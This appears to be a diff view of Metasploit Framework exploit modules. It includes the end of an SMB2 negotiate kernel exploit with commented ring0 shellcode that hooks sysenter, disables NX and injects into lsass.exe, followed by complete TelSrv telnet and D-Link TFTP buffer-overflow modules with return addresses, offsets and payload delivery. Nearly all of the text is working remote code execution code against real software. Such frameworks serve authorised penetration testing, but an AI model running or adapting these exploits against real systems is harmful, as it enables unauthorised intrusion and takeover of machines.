r0 = r0.gsub( [ 0x43434343 ].pack("V"), [ ustager ].pack("V") )
r0 = r0.gsub( [ 0x44444444 ].pack("V"), [ checksum ].pack("V") )
r0 = r0.gsub( [ 0x45454545 ].pack("V"), [ pagetable ].pack("V") )
# Return the ring0 -> ring3 payload blob with the real ring3 payload appended.
return r0 + payload.encoded
end
def exploit
print_status( "Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})..." )
connect
# we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest
# and srv2!SrvProcPartialCompleteCompoundedRequest
dialects = [ [ target['ReadAddress'] ].pack("V") * 25, "SMB 2.002" ]
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
data += [ 0x00000000 ].pack("V") * 37 # Must be NULL's
data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b)
data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34
data += [ 0x42424242 ].pack("V") * 7 # Unused
data += [ target['MagicIndex'] ].pack("V") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E)
data += [ 0x41414141 ].pack("V") * 6 # Unused
data += [ target.ret ].pack("V") # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2
data += ring0_x86_payload( target['PayloadOptions'] || {} ) # Our ring0 -> ring3 shellcode
# We gain code execution by returning into the SMB packet, begining with its header.
# The SMB packets Magic Header value is 0xFF534D42 which assembles to "CALL DWORD PTR [EBX+0x4D]; INC EDX"
# This will cause an access violation if executed as we can never set EBX to a valid pointer.
# To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42.
# This assembles to "ADD BYTE PTR [EBP+ECX*2+0x42], DL" which is fine as ECX will be zero and EBP is a vaild pointer.
# We patch the Signature1 value to be a jump forward into our shellcode.
packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
packet['Payload']['SMB'].v['Flags1'] = 0x18
packet['Payload']['SMB'].v['Flags2'] = 0xC853
packet['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh']
packet['Payload']['SMB'].v['Signature1'] = 0x0158E900 # "JMP DWORD 0x15D" ; jump into our ring0 payload.
packet['Payload']['SMB'].v['Signature2'] = 0x00000000 # ...
packet['Payload']['SMB'].v['MultiplexID'] = rand( 0x10000 )
packet['Payload'].v['Payload'] = data
packet = packet.to_s
print_status( "Sending the exploit packet (#{packet.length} bytes)..." )
sock.put( packet )
wtime = datastore['WAIT'].to_i
print_status( "Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger..." )
stime = Time.now.to_i
poke_logins = %W{Guest Administrator}
poke_logins.each do |login|
begin
sec = connect(false)
sec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1))
rescue ::Exception => e
sec.socket.close
end
end
while( stime + wtime > Time.now.to_i )
select(nil, nil, nil, 0.25)
break if session_created?
end
handler
disconnect
end
end
=begin
;===================================================================================
; sf
; Recommended Reading: Kernel-mode Payloads on Windows, 2005, bugcheck & skape.
; http://www.uninformed.org/?v=3&a=4&t=sumry
;===================================================================================
[bits 32]
[org 0]
;===================================================================================
ring0_migrate_start:
cld
cli
jmp short ring0_migrate_bounce ; jump to bounce to get ring0_stager_start address
ring0_migrate_patch:
pop esi ; pop off ring0_stager_start address
; get current sysenter msr (nt!KiFastCallEntry)
push 0x176 ; SYSENTER_EIP_MSR
pop ecx
rdmsr
; save origional sysenter msr (nt!KiFastCallEntry)
mov dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 0 ], eax
; retrieve the address in kernel memory where we will write the ring0 stager + ring3 code
mov edi, dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 4 ]
; patch sysenter msr to be our stager
mov eax, edi
wrmsr
; copy over stager to shared memory
mov ecx, 0x41414141 ; ( ring3_stager - ring0_stager_start + length(ring3_stager) )
rep movsb
sti ; set interrupt flag
; Halt this thread to avoid problems.
ring0_migrate_idle:
hlt
jmp short ring0_migrate_idle
ring0_migrate_bounce:
call ring0_migrate_patch ; call the patch code, pushing the ring0_stager_start address to stack
;===================================================================================
; This stager will now get called every time a ring3 process issues a sysenter
ring0_stager_start:
push byte 0 ; alloc a dword for the patched return address
pushfd ; save flags and registers
pushad
call ring0_stager_eip
ring0_stager_eip:
pop eax
; patch in the real nt!KiFastCallEntry address as our return address
mov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 0 ]
mov [ esp + 36 ], ebx
; see if we are being told to remove our sysenter hook...
cmp ecx, 0xDEADC0DE
jne ring0_stager_hook
push 0x176 ; SYSENTER_EIP_MSR
pop ecx
mov eax, ebx ; set the sysenter msr to be the real nt!KiFastCallEntry address
xor edx, edx
wrmsr
xor eax, eax ; clear eax (the syscall number) so we can continue
jmp short ring0_stager_finish
ring0_stager_hook:
; get the origional r3 return address (edx is the ring3 stack pointer)
mov esi, [ edx ]
; determine if the return is to a "ret" instruction
movzx ebx, byte [ esi ]
cmp bx, 0xC3
; only insert our ring3 stager hook if we are to return to a single ret (for stability).
jne short ring0_stager_finish
; calculate our r3 address in shared memory
mov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 8 ]
lea ebx, [ ebx + ring3_start - ring0_stager_start ]
; patch in our r3 stage as the r3 return address
mov [ edx ], ebx
; detect if NX is present (clobbers eax,ebx,ecx,edx)...
mov eax, 0x80000001
cpuid
and edx, 0x00100000 ; bit 20 is the NX bit
jz short ring0_stager_finish
; modify the correct page table entry to make our ring3 stager executable
mov edx, 0x45454545 ; we default to 0xC03FFF00 this for now (should calculate dynamically).
add edx, 4
and dword [ edx ], 0x7FFFFFFF ; clear the NX bit
; finish up by returning into the real KiFastCallEntry and then returning into our ring3 code (if hook was set).
ring0_stager_finish:
popad ; restore registers
popfd ; restore flags
ret ; return to real nt!KiFastCallEntry
ring0_stager_data:
dd 0xFFFFFFFF ; saved nt!KiFastCallEntry
dd 0x42424242 ; kernel memory address of stager (default to 0xFFDF0400)
dd 0x43434343 ; shared user memory address of stager (default to 0x7FFE0400)
;===================================================================================
ring3_start:
pushad
push byte 0x30
pop eax
cdq ; zero edx
mov ebx, [ fs : eax ] ; get the PEB
cmp [ ebx + 0xC ], edx
jz ring3_finish
mov eax, [ ebx + 0x10 ] ; get pointer to the ProcessParameters (_RTL_USER_PROCESS_PARAMETERS)
mov eax, [ eax + 0x3C ] ; get the current processes ImagePathName (unicode string)
add eax, byte 0x28 ; advance past '*:\windows\system32\' (we assume this as we want a system process).
mov ecx, [ eax ] ; compute a simple hash of the name. get first 2 wide chars of name 'l\x00s\x00'
add ecx, [ eax + 0x3 ] ; and add '\x00a\x00s'
cmp ecx, 0x44444444 ; check the hash (default to hash('lsass.exe') == 0x7373616C)
jne ring3_finish ; if we are not currently in the correct process, return to real caller
call ring3_cleanup ; otherwise we first remove our ring0 sysenter hook
call ring3_stager ; and then call the real ring3 payload
jmp ring3_finish ; should the payload return we can resume this thread correclty.
ring3_cleanup:
mov ecx, 0xDEADC0DE ; set the magic value for ecx
mov edx, esp ; save our esp in edx for sysenter
sysenter ; now sysenter into ring0 to remove the sysenter hook (return to ring3_cleanup's caller).
ring3_finish:
popad
ret ; return to the origional system calls caller
;===================================================================================
ring3_stager:
; ...ring3 stager here...
;===================================================================================
=end

232
modules/exploits/windows/telnet/gamsoft_telsrv_username.rb
View File

@ -1,122 +1,122 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'GAMSoft TelSrv 1.5 Username Buffer Overflow',
'Description' => %q{
This module exploits a username sprintf stack overflow in GAMSoft TelSrv 1.5.
Other versions may also be affected. The service terminates after exploitation,
so you only get one chance!
},
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2000-0665'],
def initialize(info = {})
super(update_info(info,
'Name' => 'GAMSoft TelSrv 1.5 Username Buffer Overflow',
'Description' => %q{
This module exploits a username sprintf stack overflow in GAMSoft TelSrv 1.5.
Other versions may also be affected. The service terminates after exploitation,
so you only get one chance!
},
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2000-0665'],
[ 'OSVDB', '373'],
[ 'BID', '1478'],
[ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip'],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a",
'StackAdjustment' => -3500,
},
'Platform' => ['win'],
'Targets' =>
[
[
'Windows 2000 Pro SP0/4 English REMOTE',
{
'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
'Offset' => 1886,
}
],
[
'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)',
{
'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
'Offset' => 3318,
}
],
[
'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)',
{
'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
'Offset' => 3358,
}
],
#[
#'Windows XP Pro SP0/1 English',
#{
# 'Ret' => 0x71aa32ad, # pop/pop/ret xp pro en ALL
# 'Offset' => 2600, # this is made up and absolutely wrong ;-)
#}
#],
#[
],
'DisclosureDate' => 'Jul 17 2000',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(23),
], self.class)
end
def check
connect
print_status("Attempting to determine if target is vulnerable...")
sleep(7)
banner = sock.get_once(-1,3)
if (banner =~ /TelSrv 1\.5/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...")
connect
print_status("Connected to telnet service... waiting several seconds.") # User friendly message due to sleep.
sleep(7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not.
username = rand_text_english(20000, payload_badchars)
seh = generate_seh_payload(target.ret)
username[target['Offset'], seh.length] = seh
print_status("Sending #{ username.length} byte username as exploit (including #{seh.length} byte payload)...")
sock.put(username)
sleep(0.25)
print_status('Exploit sent...')
handler
disconnect
end
[ 'BID', '1478'],
[ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip'],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a",
'StackAdjustment' => -3500,
},
'Platform' => ['win'],
'Targets' =>
[
[
'Windows 2000 Pro SP0/4 English REMOTE',
{
'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
'Offset' => 1886,
}
],
[
'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)',
{
'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
'Offset' => 3318,
}
],
[
'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)',
{
'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
'Offset' => 3358,
}
],
#[
#'Windows XP Pro SP0/1 English',
#{
# 'Ret' => 0x71aa32ad, # pop/pop/ret xp pro en ALL
# 'Offset' => 2600, # this is made up and absolutely wrong ;-)
#}
#],
#[
],
'DisclosureDate' => 'Jul 17 2000',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(23),
], self.class)
end
def check
connect
print_status("Attempting to determine if target is vulnerable...")
sleep(7)
banner = sock.get_once(-1,3)
if (banner =~ /TelSrv 1\.5/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...")
connect
print_status("Connected to telnet service... waiting several seconds.") # User friendly message due to sleep.
sleep(7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not.
username = rand_text_english(20000, payload_badchars)
seh = generate_seh_payload(target.ret)
username[target['Offset'], seh.length] = seh
print_status("Sending #{ username.length} byte username as exploit (including #{seh.length} byte payload)...")
sock.put(username)
sleep(0.25)
print_status('Exploit sent...')
handler
disconnect
end
end

172
modules/exploits/windows/tftp/dlink_long_filename.rb
View File

@ -1,87 +1,87 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link TFTP 1.0 Long Filename Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in D-Link TFTP 1.0.
By sending a request for an overly long file name, an attacker
could overflow a buffer and execute arbitrary code. For best results,
use bind payloads with nonx (No NX).
},
'Author' => [
'LSO <lso[@]hushmail.com>', # Exploit module
'patrick', # Refs, stability, targets etc
],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-1435' ],
[ 'OSVDB', '33977' ],
[ 'BID', '22923' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'Compat' =>
{
'ConnectionType' => '-reverse',
},
},
'SaveRegisters' => [ 'ecx', 'eax', 'esi' ],
'Platform' => 'win',
'Targets' =>
[
# Patrick tested OK 20090228
['Windows 2000 SP4 English', { 'Ret' => 0x77e1ccf7 } ], # jmp ebx
['Windows 2000 SP3 English', { 'Ret' => 0x77f8361b } ], # jmp ebx
],
'Privileged' => false,
'DisclosureDate' => 'Mar 12 2007',
'DefaultTarget' => 0))
register_options([Opt::RPORT(69)], self)
end
def exploit
connect_udp
print_status("Trying target #{target.name}...")
juju = "\x00\x01"
juju << Rex::Text.rand_text_alpha_upper(581)
juju << Rex::Arch::X86.jmp_short(42)
juju << Rex::Text.rand_text_alpha_upper(38)
juju << [target.ret].pack('V') + payload.encoded
udp_sock.put(juju)
handler
disconnect_udp
end
end
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link TFTP 1.0 Long Filename Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in D-Link TFTP 1.0.
By sending a request for an overly long file name, an attacker
could overflow a buffer and execute arbitrary code. For best results,
use bind payloads with nonx (No NX).
},
'Author' => [
'LSO <lso[@]hushmail.com>', # Exploit module
'patrick', # Refs, stability, targets etc
],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-1435' ],
[ 'OSVDB', '33977' ],
[ 'BID', '22923' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'Compat' =>
{
'ConnectionType' => '-reverse',
},
},
'SaveRegisters' => [ 'ecx', 'eax', 'esi' ],
'Platform' => 'win',
'Targets' =>
[
# Patrick tested OK 20090228
['Windows 2000 SP4 English', { 'Ret' => 0x77e1ccf7 } ], # jmp ebx
['Windows 2000 SP3 English', { 'Ret' => 0x77f8361b } ], # jmp ebx
],
'Privileged' => false,
'DisclosureDate' => 'Mar 12 2007',
'DefaultTarget' => 0))
register_options([Opt::RPORT(69)], self)
end
def exploit
connect_udp
print_status("Trying target #{target.name}...")
juju = "\x00\x01"
juju << Rex::Text.rand_text_alpha_upper(581)
juju << Rex::Arch::X86.jmp_short(42)
juju << Rex::Text.rand_text_alpha_upper(38)
juju << [target.ret].pack('V') + payload.encoded
udp_sock.put(juju)
handler
disconnect_udp
end
end